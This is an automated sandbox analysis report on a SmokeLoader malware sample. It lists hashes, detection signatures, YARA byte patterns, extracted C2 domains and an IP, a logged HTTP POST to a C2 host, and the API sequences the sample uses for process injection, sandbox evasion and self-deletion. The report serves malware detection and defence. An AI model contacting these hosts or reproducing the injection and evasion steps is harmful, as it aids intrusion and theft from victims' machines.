Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
01885599.exe

Overview

General Information

Sample Name:01885599.exe
Analysis ID:876999
MD5:a29c587c678826f4a44cf6a2a78599f1
SHA1:92ea36730fa1f19300a27ebbb4d1359e7b8a16de
SHA256:b3fbcfd775b7c9bfc5b58f5df13eb8fbeb4844d98756f8fca41b63f060ae5132
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Contains functionality to inject code into remote processes
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • 01885599.exe (PID: 6936 cmdline: C:\Users\user\Desktop\01885599.exe MD5: A29C587C678826F4A44CF6A2A78599F1)
    • 01885599.exe (PID: 6956 cmdline: C:\Users\user\Desktop\01885599.exe MD5: A29C587C678826F4A44CF6A2A78599F1)
      • explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • vbjjhwi (PID: 6476 cmdline: C:\Users\user\AppData\Roaming\vbjjhwi MD5: A29C587C678826F4A44CF6A2A78599F1)
    • vbjjhwi (PID: 6468 cmdline: C:\Users\user\AppData\Roaming\vbjjhwi MD5: A29C587C678826F4A44CF6A2A78599F1)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2020, "C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}
SourceRuleDescriptionAuthorStrings
00000005.00000002.622842996.00000000006B8000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x7ae9:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000001.00000002.571005339.00000000005A1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000001.00000002.571005339.00000000005A1000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x2f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000006.00000002.633668542.00000000004A0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000006.00000002.633668542.00000000004A0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x6f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      Click to see the 5 entries
      SourceRuleDescriptionAuthorStrings
      1.2.01885599.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        5.2.vbjjhwi.8215a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          6.2.vbjjhwi.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            0.2.01885599.exe.7f15a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              No Sigma rule has matched
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000006.00000002.633668542.00000000004A0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2020, "C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}
              Source: 01885599.exeVirustotal: Detection: 37%Perma Link
              Source: http://host-host-file8.com/URL Reputation: Label: malware
              Source: host-file-host6.comVirustotal: Detection: 22%Perma Link
              Source: host-host-file8.comVirustotal: Detection: 19%Perma Link
              Source: C:\Users\user\AppData\Roaming\vbjjhwiReversingLabs: Detection: 40%
              Source: C:\Users\user\AppData\Roaming\vbjjhwiVirustotal: Detection: 37%Perma Link
              Source: 01885599.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Roaming\vbjjhwiJoe Sandbox ML: detected
              Source: 01885599.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 00000003.00000000.569751105.00007FF883751000.00000020.00000001.01000000.00000007.sdmp
              Source: Binary string: MHC:\nodiga.pdb source: 01885599.exe, vbjjhwi.3.dr
              Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 00000003.00000000.569751105.00007FF883751000.00000020.00000001.01000000.00000007.sdmp
              Source: Binary string: C:\nodiga.pdb source: 01885599.exe, vbjjhwi.3.dr
              Source: Binary string: eex.pdb source: explorer.exe, 00000003.00000000.569751105.00007FF883751000.00000020.00000001.01000000.00000007.sdmp
              Source: C:\Users\user\Desktop\01885599.exeCode function: 0_2_00403870 GetStringTypeExA,FindFirstVolumeMountPointW,GetPrivateProfileIntA,WaitForSingleObject,FreeConsole,GetConsoleCursorInfo,GetModuleFileNameW,EnumFontsW,GetConsoleCursorInfo,GetModuleFileNameW,EnumFontsW,GetVersionExW,GetConsoleAliasesLengthA,SleepEx,CreateFileMappingW,CreateMutexA,GetCommState,FreeConsole,MapGenericMask,DebugBreak,AttachConsole,MapGenericMask,DebugBreak,FreeConsole,AttachConsole,FreeConsole,InterlockedExchangeAdd,WaitForMultipleObjectsEx,GetCharWidthW,GetCharABCWidthsFloatW,GetCharWidthW,GetCharABCWidthsFloatW,GetLastError,GetLastError,ReplaceFileA,WritePrivateProfileStringW,lstrcmpiW,CreateEventW,ReplaceFileA,WritePrivateProfileStringW,lstrcmpiW,CreateEventW,MulDiv,CreateActCtxA,GetFileAttributesExW,GetLogicalDriveStringsA,MulDiv,CreateActCtxA,GetFileAttributesExW,GetLogicalDriveStringsA,GetLongPathNameA,WritePrivateProfileStructW,IsBadReadPtr,CancelWaitableTimer,GetFileType,GetModuleHandleA,0_2_00403870

              Networking

              barindex
              Source: C:\Windows\explorer.exeDomain query: host-file-host6.com
              Source: C:\Windows\explorer.exeDomain query: host-host-file8.com
              Source: C:\Windows\explorer.exeNetwork Connect: 194.50.153.68 80Jump to behavior
              Source: Malware configuration extractorURLs: http://host-file-host6.com/
              Source: Malware configuration extractorURLs: http://host-host-file8.com/
              Source: Joe Sandbox ViewASN Name: GAZ-IS-ASRU GAZ-IS-ASRU
              Source: Joe Sandbox ViewIP Address: 194.50.153.68 194.50.153.68
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oncejkc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: host-file-host6.com
              Source: explorer.exe, 00000003.00000000.570166430.00007FF883839000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov
              Source: explorer.exe, 00000003.00000000.570166430.00007FF883839000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro
              Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oncejkc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: host-file-host6.com
              Source: unknownDNS traffic detected: queries for: host-file-host6.com

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: Yara matchFile source: 1.2.01885599.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.vbjjhwi.8215a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.vbjjhwi.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.01885599.exe.7f15a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.571005339.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.633668542.00000000004A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.570947519.0000000000420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.633696994.00000000005B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: 01885599.exe, 00000000.00000002.530524455.00000000008DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

              System Summary

              barindex
              Source: 00000005.00000002.622842996.00000000006B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
              Source: 00000001.00000002.571005339.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 00000006.00000002.633668542.00000000004A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 00000001.00000002.570947519.0000000000420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 00000006.00000002.633696994.00000000005B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 00000000.00000002.530540948.00000000008E9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
              Source: 01885599.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 00000005.00000002.622842996.00000000006B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
              Source: 00000001.00000002.571005339.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 00000006.00000002.633668542.00000000004A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 00000001.00000002.570947519.0000000000420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 00000006.00000002.633696994.00000000005B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 00000000.00000002.530540948.00000000008E9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
              Source: C:\Users\user\Desktop\01885599.exeCode function: 0_2_004118DE0_2_004118DE
              Source: C:\Users\user\Desktop\01885599.exeCode function: 0_2_0040A4AA0_2_0040A4AA
              Source: C:\Users\user\Desktop\01885599.exeCode function: 0_2_0041251A0_2_0041251A
              Source: C:\Users\user\Desktop\01885599.exeCode function: 0_2_004132E10_2_004132E1
              Source: C:\Users\user\Desktop\01885599.exeCode function: 0_2_0041139A0_2_0041139A
              Source: C:\Users\user\Desktop\01885599.exeCode function: String function: 00407404 appears 35 times
              Source: C:\Users\user\Desktop\01885599.exeCode function: 0_2_007F0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,0_2_007F0110
              Source: C:\Users\user\Desktop\01885599.exeCode function: 1_2_0040180C Sleep,NtTerminateProcess,1_2_0040180C
              Source: C:\Users\user\Desktop\01885599.exeCode function: 1_2_00401818 Sleep,NtTerminateProcess,1_2_00401818
              Source: C:\Users\user\Desktop\01885599.exeCode function: 1_2_00401822 Sleep,NtTerminateProcess,1_2_00401822
              Source: C:\Users\user\Desktop\01885599.exeCode function: 1_2_00401826 Sleep,NtTerminateProcess,1_2_00401826
              Source: C:\Users\user\Desktop\01885599.exeCode function: 1_2_00401834 Sleep,NtTerminateProcess,1_2_00401834
              Source: C:\Users\user\AppData\Roaming\vbjjhwiCode function: 5_2_00820110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,5_2_00820110
              Source: C:\Users\user\AppData\Roaming\vbjjhwiCode function: 6_2_0040180C Sleep,NtTerminateProcess,6_2_0040180C
              Source: C:\Users\user\AppData\Roaming\vbjjhwiCode function: 6_2_00401818 Sleep,NtTerminateProcess,6_2_00401818
              Source: C:\Users\user\AppData\Roaming\vbjjhwiCode function: 6_2_00401822 Sleep,NtTerminateProcess,6_2_00401822
              Source: C:\Users\user\AppData\Roaming\vbjjhwiCode function: 6_2_00401826 Sleep,NtTerminateProcess,6_2_00401826
              Source: C:\Users\user\AppData\Roaming\vbjjhwiCode function: 6_2_00401834 Sleep,NtTerminateProcess,6_2_00401834
              Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
              Source: 01885599.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: vbjjhwi.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 01885599.exeVirustotal: Detection: 37%
              Source: 01885599.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\01885599.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\01885599.exe C:\Users\user\Desktop\01885599.exe
              Source: C:\Users\user\Desktop\01885599.exeProcess created: C:\Users\user\Desktop\01885599.exe C:\Users\user\Desktop\01885599.exe
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\vbjjhwi C:\Users\user\AppData\Roaming\vbjjhwi
              Source: C:\Users\user\AppData\Roaming\vbjjhwiProcess created: C:\Users\user\AppData\Roaming\vbjjhwi C:\Users\user\AppData\Roaming\vbjjhwi
              Source: C:\Users\user\Desktop\01885599.exeProcess created: C:\Users\user\Desktop\01885599.exe C:\Users\user\Desktop\01885599.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\vbjjhwiProcess created: C:\Users\user\AppData\Roaming\vbjjhwi C:\Users\user\AppData\Roaming\vbjjhwiJump to behavior
              Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vbjjhwiJump to behavior
              Source: classification engineClassification label: mal100.troj.evad.winEXE@6/3@4/1
              Source: C:\Users\user\Desktop\01885599.exeCommand line argument: T#0y0_2_00403FE0
              Source: C:\Users\user\Desktop\01885599.exeCommand line argument: #"#0_2_00403FE0
              Source: C:\Users\user\Desktop\01885599.exeCommand line argument: .d|10_2_00403FE0
              Source: C:\Users\user\Desktop\01885599.exeCommand line argument: K[0_2_00403FE0
              Source: C:\Users\user\Desktop\01885599.exeCommand line argument: ZBE0_2_00403FE0
              Source: C:\Users\user\Desktop\01885599.exeCommand line argument: kernel32.dll0_2_00403FE0
              Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: 01885599.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: 01885599.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: 01885599.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: 01885599.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: 01885599.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: 01885599.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: 01885599.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 00000003.00000000.569751105.00007FF883751000.00000020.00000001.01000000.00000007.sdmp
              Source: Binary string: MHC:\nodiga.pdb source: 01885599.exe, vbjjhwi.3.dr
              Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 00000003.00000000.569751105.00007FF883751000.00000020.00000001.01000000.00000007.sdmp
              Source: Binary string: C:\nodiga.pdb source: 01885599.exe, vbjjhwi.3.dr
              Source: Binary string: eex.pdb source: explorer.exe, 00000003.00000000.569751105.00007FF883751000.00000020.00000001.01000000.00000007.sdmp

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\01885599.exeUnpacked PE file: 1.2.01885599.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
              Source: C:\Users\user\AppData\Roaming\vbjjhwiUnpacked PE file: 6.2.vbjjhwi.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
              Source: C:\Users\user\Desktop\01885599.exeCode function: 0_2_00407449 push ecx; ret 0_2_0040745C
              Source: C:\Users\user\Desktop\01885599.exeCode function: 0_2_00403770 push ecx; mov dword ptr [esp], 00000000h0_2_00403771
              Source: C:\Users\user\Desktop\01885599.exeCode function: 0_2_007F1977 push ebx; iretd 0_2_007F19B7
              Source: C:\Users\user\Desktop\01885599.exeCode function: 0_2_007F1970 push ebx; iretd 0_2_007F19B7
              Source: C:\Users\user\Desktop\01885599.exeCode function: 0_2_007F198B push ebx; iretd 0_2_007F19B7
              Source: C:\Users\user\Desktop\01885599.exeCode function: 1_2_004011D0 push ebx; iretd 1_2_00401217
              Source: C:\Users\user\Desktop\01885599.exeCode function: 1_2_004011D7 push ebx; iretd 1_2_00401217
              Source: C:\Users\user\Desktop\01885599.exeCode function: 1_2_004011EB push ebx; iretd 1_2_00401217
              Source: C:\Users\user\AppData\Roaming\vbjjhwiCode function: 5_2_0082198B push ebx; iretd 5_2_008219B7
              Source: C:\Users\user\AppData\Roaming\vbjjhwiCode function: 5_2_00821970 push ebx; iretd 5_2_008219B7
              Source: C:\Users\user\AppData\Roaming\vbjjhwiCode function: 5_2_00821977 push ebx; iretd 5_2_008219B7
              Source: C:\Users\user\AppData\Roaming\vbjjhwiCode function: 6_2_004011D0 push ebx; iretd 6_2_00401217
              Source: C:\Users\user\AppData\Roaming\vbjjhwiCode function: 6_2_004011D7 push ebx; iretd 6_2_00401217
              Source: C:\Users\user\AppData\Roaming\vbjjhwiCode function: 6_2_004011EB push ebx; iretd 6_2_00401217
              Source: C:\Users\user\Desktop\01885599.exeCode function: 0_2_0040D6B0 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_0040D6B0
              Source: initial sampleStatic PE information: section name: .text entropy: 7.581715328183715
              Source: initial sampleStatic PE information: section name: .text entropy: 7.581715328183715
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vbjjhwiJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vbjjhwiJump to dropped file

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\01885599.exeJump to behavior
              Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\vbjjhwi:Zone.Identifier read attributes | deleteJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: vbjjhwi, 00000006.00000002.633709015.00000000005EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
              Source: C:\Users\user\Desktop\01885599.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\Desktop\01885599.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\Desktop\01885599.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\Desktop\01885599.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\Desktop\01885599.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\Desktop\01885599.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\vbjjhwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\vbjjhwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\vbjjhwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\vbjjhwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\vbjjhwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\vbjjhwiKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Windows\explorer.exe TID: 860Thread sleep count: 505 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 640Thread sleep count: 300 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 640Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 4628Thread sleep count: 187 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 3728Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 6600Thread sleep count: 516 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 6588Thread sleep count: 203 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 6584Thread sleep count: 248 > 30Jump to behavior
              Source: C:\Windows\explorer.exeLast function: Thread delayed
              Source: C:\Windows\explorer.exeLast function: Thread delayed
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 505Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 516Jump to behavior
